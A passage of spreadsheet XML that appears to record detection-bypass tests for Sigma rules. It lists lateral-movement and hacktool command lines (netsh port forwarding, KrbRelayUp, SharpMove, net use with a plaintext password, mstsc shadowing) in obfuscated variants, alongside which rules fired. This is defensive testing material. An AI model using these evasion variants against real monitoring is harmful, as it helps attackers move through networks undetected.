          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C269" s="41" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D269" s="41" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E269" s="41" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe   -Embedding</t>
        </is>
      </c>
      <c r="F269" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G269" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H269" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I269" s="41" t="n"/>
      <c r="J269" s="41" t="n"/>
      <c r="K269" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="270" ht="15.75" customHeight="1" s="42">
      <c r="A270" s="41" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B270" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C270" s="41" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D270" s="41" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E270" s="41" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe -Embedding:Extra</t>
        </is>
      </c>
      <c r="F270" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G270" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H270" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I270" s="41" t="n"/>
      <c r="J270" s="41" t="n"/>
      <c r="K270" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="271" ht="15.75" customHeight="1" s="42">
      <c r="A271" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B271" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C271" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D271" s="41" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E271" s="41" t="inlineStr">
        <is>
          <t>netsh "interface" "portproxy" "add" "v4tov4" listenport=1337 connectport=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F271" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G271" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H271" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I271" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J271" s="41" t="n"/>
      <c r="K271" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="272" ht="15.75" customHeight="1" s="42">
      <c r="A272" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B272" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C272" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D272" s="41" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E272" s="41" t="inlineStr">
        <is>
          <t>netsh interface portproxy add v4tov4 listenport=1337 connectport=1337 c=127.0.0.1</t>
        </is>
      </c>
      <c r="F272" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G272" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H272" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I272" s="41" t="n"/>
      <c r="J272" s="41" t="n"/>
      <c r="K272" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="273" ht="15.75" customHeight="1" s="42">
      <c r="A273" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B273" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C273" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D273" s="41" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E273" s="41" t="inlineStr">
        <is>
          <t>netsh interface portproxy add v4tov4 connectport=1337 connectaddress=127.0.0.1 listenport=1337</t>
        </is>
      </c>
      <c r="F273" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G273" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H273" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I273" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J273" s="41" t="n"/>
      <c r="K273" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="274" ht="15.75" customHeight="1" s="42">
      <c r="A274" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B274" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C274" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D274" s="41" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E274" s="41" t="inlineStr">
        <is>
          <t>netsh interface portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=localhost</t>
        </is>
      </c>
      <c r="F274" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G274" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H274" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I274" s="41" t="n"/>
      <c r="J274" s="41" t="n"/>
      <c r="K274" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="275" ht="15.75" customHeight="1" s="42">
      <c r="A275" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B275" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C275" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D275" s="41" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E275" s="41" t="inlineStr">
        <is>
          <t>netsh.exe "interface" "portproxy" add v4tov4 listenport=3389 listenaddress=192.0.2.10 connectport=3389 connectaddress=192.0.2.10</t>
        </is>
      </c>
      <c r="F275" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G275" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H275" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I275" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J275" s="41" t="n"/>
      <c r="K275" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="276" ht="15.75" customHeight="1" s="42">
      <c r="A276" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B276" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C276" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D276" s="41" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E276" s="41" t="inlineStr">
        <is>
          <t>netsh.exe	interface	portproxy	add	v4tov4	listenport=3389	listenaddress=192.0.2.10	connectport=3389	connectaddress=192.0.2.10</t>
        </is>
      </c>
      <c r="F276" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G276" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H276" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I276" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J276" s="41" t="n"/>
      <c r="K276" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="277" ht="15.75" customHeight="1" s="42">
      <c r="A277" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B277" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C277" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D277" s="41" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E277" s="41" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport=0x0D3D listenaddress=192.0.2.10 connectport=3389 connectaddress=192.0.2.10</t>
        </is>
      </c>
      <c r="F277" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G277" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H277" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I277" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE (782d6f3e-4c5d-4b8c-92a3-1d05fed72e63); New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J277" s="41" t="n"/>
      <c r="K277" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="278" ht="15.75" customHeight="1" s="42">
      <c r="A278" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B278" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C278" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D278" s="41" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E278" s="41" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport="3389" listenaddress=192.0.2.10 connectport=3389 connectaddress=192.0.2.10</t>
        </is>
      </c>
      <c r="F278" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G278" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H278" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I278" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE (782d6f3e-4c5d-4b8c-92a3-1d05fed72e63); New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J278" s="41" t="n"/>
      <c r="K278" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="279" ht="15.75" customHeight="1" s="42">
      <c r="A279" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B279" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C279" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D279" s="41" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E279" s="41" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport=3389 listenaddress=192.0.2.10 connectport=3389 "connectaddress"=192.0.2.10</t>
        </is>
      </c>
      <c r="F279" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G279" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H279" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I279" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE (782d6f3e-4c5d-4b8c-92a3-1d05fed72e63); New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J279" s="41" t="n"/>
      <c r="K279" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="280" ht="15.75" customHeight="1" s="42">
      <c r="A280" s="41" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B280" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelayup</t>
        </is>
      </c>
      <c r="C280" s="41" t="inlineStr">
        <is>
          <t>HackTool - KrbRelayUp Execution</t>
        </is>
      </c>
      <c r="D280" s="41" t="inlineStr">
        <is>
          <t>12827a56-61a4-476a-a9cb-f3068f191073</t>
        </is>
      </c>
      <c r="E280" s="41" t="inlineStr">
        <is>
          <t>KrbRelayUp.exe /relay /Domain domain.local /ComputerName target-dc</t>
        </is>
      </c>
      <c r="F280" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G280" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H280" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I280" s="41" t="n"/>
      <c r="J280" s="41" t="n"/>
      <c r="K280" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="281" ht="15.75" customHeight="1" s="42">
      <c r="A281" s="41" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B281" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelayup</t>
        </is>
      </c>
      <c r="C281" s="41" t="inlineStr">
        <is>
          <t>HackTool - KrbRelayUp Execution</t>
        </is>
      </c>
      <c r="D281" s="41" t="inlineStr">
        <is>
          <t>12827a56-61a4-476a-a9cb-f3068f191073</t>
        </is>
      </c>
      <c r="E281" s="41" t="inlineStr">
        <is>
          <t>KrbRelayUp.exe "relay" -Domain domain.local -ComputerName target-dc</t>
        </is>
      </c>
      <c r="F281" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G281" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H281" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I281" s="41" t="n"/>
      <c r="J281" s="41" t="n"/>
      <c r="K281" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="282" ht="15.75" customHeight="1" s="42">
      <c r="A282" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B282" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpmove</t>
        </is>
      </c>
      <c r="C282" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpMove Tool Execution</t>
        </is>
      </c>
      <c r="D282" s="41" t="inlineStr">
        <is>
          <t>055fb54c-a8f4-4aee-bd44-f74cf30a0d9d</t>
        </is>
      </c>
      <c r="E282" s="41" t="inlineStr">
        <is>
          <t>SharpMove.exe "computername="dc01 "action="create command=calc.exe</t>
        </is>
      </c>
      <c r="F282" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G282" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H282" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I282" s="41" t="n"/>
      <c r="J282" s="41" t="n"/>
      <c r="K282" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="283" ht="15.75" customHeight="1" s="42">
      <c r="A283" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B283" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpmove</t>
        </is>
      </c>
      <c r="C283" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpMove Tool Execution</t>
        </is>
      </c>
      <c r="D283" s="41" t="inlineStr">
        <is>
          <t>055fb54c-a8f4-4aee-bd44-f74cf30a0d9d</t>
        </is>
      </c>
      <c r="E283" s="41" t="inlineStr">
        <is>
          <t>SharpMove.exe computername="dc01" action="create" command=calc.exe</t>
        </is>
      </c>
      <c r="F283" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G283" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H283" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I283" s="41" t="n"/>
      <c r="J283" s="41" t="n"/>
      <c r="K283" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="284" ht="15.75" customHeight="1" s="42">
      <c r="A284" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B284" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpmove</t>
        </is>
      </c>
      <c r="C284" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpMove Tool Execution</t>
        </is>
      </c>
      <c r="D284" s="41" t="inlineStr">
        <is>
          <t>055fb54c-a8f4-4aee-bd44-f74cf30a0d9d</t>
        </is>
      </c>
      <c r="E284" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c SharpMove.exe computern^ame=dc01 act^ion=create command=calc.exe</t>
        </is>
      </c>
      <c r="F284" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G284" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H284" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I284" s="41" t="n"/>
      <c r="J284" s="41" t="n"/>
      <c r="K284" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="285" ht="15.75" customHeight="1" s="42">
      <c r="A285" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B285" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpmove</t>
        </is>
      </c>
      <c r="C285" s="41" t="inlineStr">
        <is>
          <t>HackTool - SharpMove Tool Execution</t>
        </is>
      </c>
      <c r="D285" s="41" t="inlineStr">
        <is>
          <t>055fb54c-a8f4-4aee-bd44-f74cf30a0d9d</t>
        </is>
      </c>
      <c r="E285" s="41" t="inlineStr">
        <is>
          <t>SharpMove.exe computername=dc01 action=CREATE command=calc.exe</t>
        </is>
      </c>
      <c r="F285" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G285" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H285" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I285" s="41" t="n"/>
      <c r="J285" s="41" t="n"/>
      <c r="K285" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="286" ht="15.75" customHeight="1" s="42">
      <c r="A286" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B286" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C286" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D286" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E286" s="41" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share -USER:domain\user password</t>
        </is>
      </c>
      <c r="F286" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G286" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H286" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I286" s="41" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165); Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165); System Network Connections Discovery Via Net.EXE (1c67a717-32ba-409b-a45d-0fb704a73a81); System Network Connections Discovery Via Net.EXE (1c67a717-32ba-409b-a45d-0fb704a73a81); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J286" s="41" t="n"/>
      <c r="K286" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="287" ht="15.75" customHeight="1" s="42">
      <c r="A287" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B287" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C287" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D287" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E287" s="41" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share /USER:domain\user password</t>
        </is>
      </c>
      <c r="F287" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G287" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H287" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I287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87" s="41" t="n"/>
      <c r="K287" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="288" ht="15.75" customHeight="1" s="42">
      <c r="A288" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B288" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C288" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D288" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E288" s="41" t="inlineStr">
        <is>
          <t>net use "\192.0.2.10\share" /USER:domain\user password</t>
        </is>
      </c>
      <c r="F288" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G288" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H288" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I288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88" s="41" t="n"/>
      <c r="K288" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="289" ht="15.75" customHeight="1" s="42">
      <c r="A289" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B289" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C289" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D289" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E289" s="41" t="inlineStr">
        <is>
          <t>net	use	\192.0.2.10\share	/USER:domain\user	password</t>
        </is>
      </c>
      <c r="F289" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G289" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H289" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I289" s="41" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J289" s="41" t="n"/>
      <c r="K289" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="290" ht="15.75" customHeight="1" s="42">
      <c r="A290" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B290" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C290" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D290" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E290" s="41" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share /USER:"domain\user" password</t>
        </is>
      </c>
      <c r="F290" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G290" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H290" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I290" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE (d4498716-1d52-438f-8084-4a603157d131); Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165); System Network Connections Discovery Via Net.EXE (1c67a717-32ba-409b-a45d-0fb704a73a81); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J290" s="41" t="n"/>
      <c r="K290" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="291" ht="15.75" customHeight="1" s="42">
      <c r="A291" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B291" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C291" s="41" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D291" s="41" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E291" s="41" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe</t>
        </is>
      </c>
      <c r="F291" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G291" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H291" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I291" s="41" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without CommandLine Parameters (1775e15e-b61b-4d14-a1a3-80981298085a); Bad Opsec Defaults Sacrificial Processes With Improper Arguments (a7c3d773-caef-227e-a7e7-c2f13c622329); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J291" s="41" t="n"/>
      <c r="K291" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="292" ht="15.75" customHeight="1" s="42">
      <c r="A292" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B292" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C292" s="41" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D292" s="41" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E292" s="41" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32".exe</t>
        </is>
      </c>
      <c r="F292" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G292" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H292" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I292" s="41" t="n"/>
      <c r="J292" s="41" t="n"/>
      <c r="K292" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="293" ht="15.75" customHeight="1" s="42">
      <c r="A293" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B293" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C293" s="41" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D293" s="41" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E293" s="41" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe .\</t>
        </is>
      </c>
      <c r="F293" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G293" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H293" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I293" s="41" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J293" s="41" t="n"/>
      <c r="K293" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="294" ht="15.75" customHeight="1" s="42">
      <c r="A294" s="41" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B294" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_rdp_hijack_shadowing</t>
        </is>
      </c>
      <c r="C294" s="41" t="inlineStr">
        <is>
          <t>Potential MSTSC Shadowing Activity</t>
        </is>
      </c>
      <c r="D294" s="41" t="inlineStr">
        <is>
          <t>6ba5a05f-b095-4f0a-8654-b825f4f16334</t>
        </is>
      </c>
      <c r="E294" s="41" t="inlineStr">
        <is>
          <t>mstsc.exe /shadow:1 /NoConsentPrompt</t>
        </is>
      </c>
      <c r="F294" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G294" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H294" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I294" s="41" t="inlineStr">
        <is>
          <t>Potential MSTSC Shadowing Activity (6ba5a05f-b095-4f0a-8654-b825f4f16334); Potential MSTSC Shadowing Activity (6ba5a05f-b095-4f0a-8654-b825f4f16334)</t>
        </is>
      </c>
      <c r="J294" s="41" t="n"/>
      <c r="K294" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="295" ht="15.75" customHeight="1" s="42">
      <c r="A295" s="41" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B295" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_rdp_hijack_shadowing</t>
        </is>
